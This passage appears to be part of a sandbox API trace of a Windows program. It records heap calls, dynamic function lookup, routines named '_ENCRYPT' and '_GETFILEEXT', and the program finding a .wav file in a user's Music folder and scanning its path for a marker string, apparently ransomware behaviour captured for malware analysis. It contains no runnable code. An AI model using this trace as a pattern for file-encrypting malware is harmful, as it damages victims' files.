(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0182.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0182.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0182.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0182.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.057] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0182.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0182.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0182.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0182.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0182.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0182.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0182.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0182.057] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0182.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0182.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0182.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0182.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0182.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0182.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0182.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0182.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0182.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0182.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0182.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0182.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0182.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0182.058] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0182.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0182.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0182.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0182.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0182.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0182.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0182.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0182.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0182.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0182.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0182.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0182.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0182.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0182.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0182.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0182.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0182.059] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0182.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0182.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0182.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0182.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f58 [0182.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9f58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0182.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0182.059] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0182.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0182.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0182.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0182.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0182.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0182.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0182.059] CloseHandle (hObject=0x120) returned 1 [0182.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0182.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0182.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0182.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0182.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0182.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0182.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0182.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0182.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0182.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0182.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0182.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0182.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0182.060] FreeLibrary (hLibModule=0x75990000) returned 1 [0182.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0182.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0182.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0182.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0182.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0182.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0182.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0182.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0182.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0182.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0182.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0182.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0182.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0182.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0182.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0182.061] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0182.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0182.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0182.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0182.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0182.061] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0182.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0182.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0182.061] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0182.061] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0182.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0182.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0182.061] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0182.061] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0182.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0182.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0182.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0182.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0182.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0182.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0182.076] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0182.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0182.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0182.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0182.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0182.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0182.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0182.077] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0182.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0182.077] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0182.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0182.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0182.077] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ad4f0, ftCreationTime.dwHighDateTime=0x1d5daa3, ftLastAccessTime.dwLowDateTime=0xa12b5b80, ftLastAccessTime.dwHighDateTime=0x1d5e5cc, ftLastWriteTime.dwLowDateTime=0xa12b5b80, ftLastWriteTime.dwHighDateTime=0x1d5e5cc, nFileSizeHigh=0x0, nFileSizeLow=0x18a5d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="R64I-TKxh1f.wav", cAlternateFileName="R64I-T~1.WAV")) returned 0x90add8 [0182.078] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0182.078] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.078] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ad4f0, ftCreationTime.dwHighDateTime=0x1d5daa3, ftLastAccessTime.dwLowDateTime=0xa12b5b80, ftLastAccessTime.dwHighDateTime=0x1d5e5cc, ftLastWriteTime.dwLowDateTime=0xa12b5b80, ftLastWriteTime.dwHighDateTime=0x1d5e5cc, nFileSizeHigh=0x0, nFileSizeLow=0x18a5d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="R64I-TKxh1f.wav", cAlternateFileName="R64I-T~1.WAV")) returned 0x90add8 [0182.079] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0182.079] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 